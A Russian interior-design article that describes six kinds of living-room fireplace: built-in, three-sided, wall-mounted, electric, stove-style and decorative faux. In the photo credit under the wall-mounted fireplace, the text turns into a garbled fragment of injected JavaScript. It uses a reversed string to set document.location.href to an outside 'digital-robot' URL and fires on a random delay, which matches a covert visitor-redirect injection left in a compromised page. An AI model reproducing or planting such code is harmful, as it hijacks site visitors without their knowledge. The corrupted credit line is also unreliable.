Добавить в закладки

В поисках практичного и симпатичного камина для гостиной: 6 популярных моделей

Камин в гостиной – это прекрасное дополнение к интерьеру, способное добавить уют и тепло в обстановку, а также подчеркнуть хороший вкус хозяев дома. Мы предлагаем подробнее узнать о распространенных видах.

Камин в интерьере гостиной

Камин в интерьере гостиной. Фото: hvosty.ru

Встроенный камин

Устанавливается в просторных помещениях. Для его монтажа требуется немало времени. Основная часть конструкции и дымоход встраивается в стенную нишу. Главной его способностью является возможность обогревать не только гостиную, но и смежные комнаты.

Встроенный камин в интерьере гостиной

Встроенный камин в интерьере гостиной. Фото: kursremonta.ru

Трехсторонний камин

Конструкция представляет собой три прозрачных стенки, вмонтированных в фальшстену, которая чаще всего выполняет функцию перегородки. В качестве горючего используется газ, переработанное дерево, биоэтанол. Безопасный камин производит равномерный обогрев помещения, который можно регулировать переключателем.

Трехсторонний камин в интерьере гостиной

Трехсторонний камин в интерьере гостиной. Фото: ochg.ru

Настенный камин

Эта модель самая простая в установке. Делают ее из металла или стекла. Размещают возле розетки. Красивую негабаритную конструкцию легко очищать от пыли.

Настенный камин в интерьере гостиной

Настенный камин в интерьере гостиной. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topdom.ru»>www.tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topdom.ru

Электрический камин

Его собирают из пластиковых деталей и ткани, имитирующей горение огня. Иногда внутри устанавливается отражатель для более реалистичного эффекта. Современные модели дополняют звуковым сопровождением, позволяющим забыть, что перед вами искусственный костер.

Электрический камин в интерьере гостиной

Электрический камин в интерьере гостиной. Фото: intererro.ru

Камин-буржуйка

Прототипом сооружения стали старинные дровяные печки. Компактная конструкция изготавливается из чугуна, металла с облицовкой из керамики. Отлично подходит для стилей лофт или кантри.

Камин-буржуйка в интерьере гостиной

Камин-буржуйка в интерьере гостиной. Фото: www.remontbp.com

Фальш-камин

Декоративный элемент интерьера создается при помощи рамы, изготовленной из гипсокартона. Внутри нее могут размещаться свечи, имитирующие костер или же электрокамин, встроенный в стену.

Фальш-камин в интерьере гостиной

Фальш-камин в интерьере гостиной. Фото: i.pinimg.com

Правильно подобранный «теплый» символ домашнего уюта камин превратит дизайн в гармоничную композицию.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 13.07.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: